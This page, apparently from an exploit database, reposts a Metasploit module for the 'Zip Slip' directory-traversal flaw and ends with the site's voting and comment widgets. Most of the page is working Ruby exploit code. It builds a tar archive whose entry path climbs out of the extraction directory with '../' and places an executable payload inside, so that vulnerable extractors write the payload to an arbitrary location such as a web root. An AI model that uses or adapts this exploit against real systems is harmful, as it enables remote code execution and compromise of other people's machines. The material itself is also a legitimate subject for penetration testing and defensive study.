Generic Zip Slip Traversal

2019.09.12

Credit: sinn3r

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-22

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Generic Zip Slip Traversal Vulnerability",
      'Description'    => %q{
        This is a generic arbitrary file overwrite technique, which typically results in remote
        command execution. This targets a simple yet widespread vulnerability that has been
        seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.
        The idea is that often archive extraction libraries have no mitigations against
        directory traversal attacks. If an application uses it, there is a risk when opening an
        archive that is maliciously modified, and result in the embedded payload to be written
        to an arbitrary location (such as a web root), and result in remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Snyk',  # Technique discovery
          'sinn3r' # Metasploit
        ],
      'References'     =>
        [
          ['URL', 'https://snyk.io/research/zip-slip-vulnerability']
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => true
        },
      'Platform'       => ['linux', 'win', 'unix'],
      'Targets'        =>
        [
          ['Manually determined', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 05 2018"
    ))

    register_options([
      OptString.new('FILENAME', [true, 'The tar file (tar)', 'msf.tar']),
      OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
    ])
  end

  class ZipSlipArchive
    attr_reader :data
    attr_reader :fname
    attr_reader :payload

    def initialize(n, p)
      @fname = n
      @payload = p
      @data = make
    end

    def make
      data = ''
      path = Rex::FileUtils.normalize_unix_path(fname)
      tar = StringIO.new
      Rex::Tar::Writer.new(tar) do |t|
        t.add_file(path, 0777) do |f|
          f.write(payload)
        end
      end
      tar.seek(0)
      data = tar.read
      tar.close
      data
    end
  end

  def make_tar(target_payload_path)
    elf = generate_payload_exe(code: payload.encoded)
    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe)
    archive.make
  end

  def exploit
    target_payload_path = datastore['TARGETPAYLOADPATH']
    unless target_payload_path.match(/\.\.\//)
      print_error('Please set a traversal path')
      return
    end

    tar = make_tar(target_payload_path)
    file_create(tar)
    print_status('When extracted, the payload is expected to extract to:')
    print_status(target_payload_path)
  end
end

=begin
A quick test:

$ python
>>> import tarfile
>>> t = tarfile.open('test.tar')
>>> t.extractall()
>>> exit()

=end

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Generic Zip Slip Traversal

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.